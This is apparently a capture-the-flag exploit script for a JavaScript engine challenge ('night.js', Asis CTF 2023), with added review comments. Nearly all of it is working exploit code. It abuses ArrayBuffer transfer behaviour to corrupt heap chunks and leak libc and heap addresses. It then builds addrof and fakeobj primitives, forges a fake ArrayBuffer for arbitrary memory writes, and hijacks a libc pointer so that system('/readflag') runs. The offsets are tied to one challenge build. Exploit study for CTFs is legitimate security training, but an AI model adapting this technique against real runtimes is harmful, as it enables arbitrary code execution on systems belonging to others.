// CTF proof-of-concept (Asis CTF 2023, night.js). It is a flat script, not a library:
// it mutates globals (refs, arr, libc_leak, heap_leak, heap_base, fake_ab_addr,
// arraybuffer_vtable, arraybuffer_prototype) and never returns.
// NOTE(review): every numeric offset below (0x82f00, 0xfd010, 0xa3a0a8, 0x83680,
// 0x1a370, 0xa57720, 0x208ad0, the "+0x11abd00" remark) is a hard-coded constant
// with no derivation in this file — presumably tied to the exact challenge build and
// allocator layout; treat them as opaque, not as reusable values.
// NOTE(review): the trailing " | |" on each line is rendering residue from the
// hosting page, not part of the script.
refs = new Array(0x100); | |
// chunk consumer | |
for (let i = 0; i < 0x20; ++i) { | |
refs.push(new ArrayBuffer(0x200)); | |
refs.push(new Array(0x130)); | |
refs.push(new Array(0x40)); | |
} | |
// libc leak | |
{ | |
let leak_chunk1 = new ArrayBuffer(0x200); | |
let leak_chunk2 = new ArrayBuffer(0x200); | |
let leak_chunk3 = new ArrayBuffer(0x3df0); | |
let leak_chunk3_bi = new BigUint64Array(leak_chunk3); | |
let leak_chunk3_guard = new ArrayBuffer(0x200); | |
let oob_ab = new ArrayBuffer(0x210); | |
let oob_bi = new BigUint64Array(oob_ab); | |
oob_bi[64] = 0x0n; | |
oob_bi[65] = 0x4011n; | |
leak_chunk1.transfer(); | |
oob_ab.transferToFixedLength(0x200); | |
leak_chunk2.transfer(); | |
arr = new Array(0x40); | |
arr[0] = 1.1; | |
libc_leak = leak_chunk3_bi[0]; // +0x11abd00 | |
console.log(`libc_leak: 0x${libc_leak.toString(16)}`) | |
} | |
{ | |
let chunk1 = new ArrayBuffer(0x200); | |
let chunk2 = new ArrayBuffer(0x200); | |
let chunk3 = new ArrayBuffer(0x200); | |
let chunk3_bi = new BigUint64Array(chunk3); | |
let chunk4 = new ArrayBuffer(0x8000); | |
let chunk4_bi = new BigUint64Array(chunk4); | |
let command_buffer = new ArrayBuffer(0x400); | |
let command_buffer_bi = new BigUint64Array(command_buffer); | |
let oob_ab = new ArrayBuffer(0x210); | |
let oob_bi = new BigUint64Array(oob_ab); | |
oob_bi[64] = 0x0n; | |
oob_bi[65] = 0x421n; | |
chunk1.transfer(); | |
oob_ab.transferToFixedLength(0x200); | |
chunk2.transfer(); | |
let arr = new Array(130); | |
arr[66] = 13.37; | |
// Block-scoped `let arr` shadows the global `arr` assigned in the block above.
function addrof(o) { | |
arr[66] = o; | |
return chunk3_bi[0] & 0xffffffffffffn; | |
} | |
heap_leak = addrof(refs); | |
heap_base = heap_leak - 0x82f00n; | |
fake_ab_addr = heap_base + 0xfd010n; | |
console.log(`heap_leak: 0x${heap_leak.toString(16)}`); | |
console.log(`heap_base: 0x${heap_base.toString(16)}`); | |
console.log(`fake_ab_addr: 0x${fake_ab_addr.toString(16)}`); | |
arraybuffer_vtable = libc_leak + 0xa3a0a8n; | |
arraybuffer_prototype = heap_base + 0x83680n; | |
console.log(`arraybuffer_vtable: 0x${arraybuffer_vtable.toString(16)}`); | |
console.log(`arraybuffer_prototype: 0x${arraybuffer_prototype.toString(16)}`); | |
chunk4_bi[0x800-2] = heap_base + 0x000000000001a370n; | |
chunk4_bi[0x800+0] = arraybuffer_vtable; // vtable | |
chunk4_bi[0x800+1] = 0x1000n; // length | |
chunk4_bi[0x800+2] = arraybuffer_prototype; // prototype | |
chunk4_bi[0x800+12] = 0x1000n; // byteLength | |
chunk4_bi[0x800+14] = 0x1n; // isAttached | |
function fakeobj(addr) { | |
chunk3_bi[0] = addr | 0xfff9000000000000n; | |
return arr[66]; | |
} | |
let fake_ab = fakeobj(fake_ab_addr); | |
let fake_ab_bi = new BigUint64Array(fake_ab); | |
function write64(addr, value) { | |
chunk4_bi[0x808] = addr; | |
fake_ab_bi[0] = value; | |
} | |
command_buffer_bi[0] = 0x616c66646165722fn; | |
command_buffer_bi[1] = 0x67n; | |
// system("/readflag") | |
write64(libc_leak + 0xa57720n, libc_leak - 0x208ad0n); | |
command_buffer.transfer(); | |
// Busy-loop: the script intentionally never exits after the final transfer().
while(1); | |
} |